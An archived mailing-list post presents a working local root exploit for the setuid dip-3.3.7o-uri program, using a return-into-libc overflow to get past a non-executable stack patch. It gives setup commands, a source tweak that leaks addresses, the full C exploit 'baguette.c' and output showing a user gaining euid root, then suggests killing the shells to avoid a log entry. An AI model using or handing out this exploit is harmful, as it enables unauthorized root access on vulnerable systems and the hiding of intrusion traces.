Hi, After reading jamez's and zef's postings about dip and reviewing its sourcecode, I recalled Rafal Wojtczuk (nergal)'s post about defeating Solar Designer's non-executable stack. I asked myself "Hmmm, let's see if we can get a shell out of it even on a system with installed stackpatch." So I develpoed the following recipe: First, setup your directory like this: ----------------------------------------------------------- ln -s /bin/sh a ln -s /bin/sh aa ln -s /bin/sh aaa ln -s /bin/sh aaaa ln -s /bin/sh aaaaa ln -s /bin/sh aaaaaa ln -s /bin/sh aaaaaaa ln -s /usr/sbin/dip vul ----------------------------------------------------------- Get the dip-3.3.7o-uri package and uncompress it. Take main.c and edit it the following (preferably with vi !! :) ) : ------------------ dip-3.3.7o/main.c line 194+ ----------------------------- fp = fopen(buf, "r"); if (fp == (FILE *)0) { fprintf(stderr, "DIP: cannot open %s: %s\n", buf, strerror(errno)); + fprintf(stderr, "labels: %p %p\n", &system, nam); return; } ---------------------------------------------------------------------------- Of course you can juat use gdb and issue the "p system" command as well, that avoids getting the package. Now compile and run it, you get: ---------------------------------------------------------------------------- pigsnspace$ dip -k -l aaaa DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96) Written by Fred N. van Kempen, MicroWalt Corporation. DIP: cannot open /usr/spool/uucp/LCK..aaaa: No such file or directory labels: 0x80493e8 0xbffff6f0 ---------------------------------------------------------------------------- Insert the first number you get into the following exploit: -------------------------- baguette.c -------------------------------- /* * Programm to get a shell from dip-3.3.7o-uri on a system with * Solar Designer's stackpatch installed. * by tstroegeat_private-erlangen.de * credits to jamez, zef and especially * Rafal Wojtczuk for his howto ;) * * Of course this is just for educational purposes :) */ #include <stdio.h> #define SYSTEM 0x80493e8 /* address of system entry */ #define SOMESTACK 0xbffffea0 /* adress on stack where argv[1] should be. Usually somewhere on top */ int main(int argc, char *argv[]) { char *name[]={"./vul", "-k", "-l", NULL, NULL}; char mem[1024], *ptr; int i, code[]={ SYSTEM, SOMESTACK, SOMESTACK, 0 }, off=atoi(argv[1]); for (ptr=mem, i=0; i < 1024; i+=8, ptr+=8) memcpy(ptr, "aaaaaaa;", 8); ptr=mem+off; strcpy(ptr, (char *)&(code[0])); mem[1023]=0; name[3]=(char *)mem; printf("%s (%d/%d)\n", mem, strlen(mem), off); execve(name[0], name, NULL); return 0; } ---------------------------------------------------------------------- (SOMESTACK is someway above 0xbffff6f0, here it was 0xbffffea0) Running this program should do. On my platform offset 113 did the job: ---------------------------------------------------------------------- pigsnspace$ gcc baguette.c -o exp pigsnspace$ id uid=1047(piggy) gid=100(users) groups=100(users) pigsnspace$ ./exp 113 aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aè þÿ¿ þÿ¿ (125/113) DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96) Written by Fred N. van Kempen, MicroWalt Corporation. DIP: cannot open /var/lock/LCK..aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aè þÿ¿ þÿ¿: No such file or directory pigsnspace# id uid=1047(piggy) gid=100(users) euid=0(root) groups=100(users) ---------------------------------------------------------------------- Well, so much to this. You should keep in mind that getting the right offset value (the 113 somewhere above) and the address of SYSTEM and SOMESTACK can be difficult. Most probably this program will not work at once (see more about it in nergals article). Those values worked here, but you will have to experiment. After exiting the neat shells, you'll get a systerm log. So you should maybe just kill them using kill ...... tst.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:53:24 PDT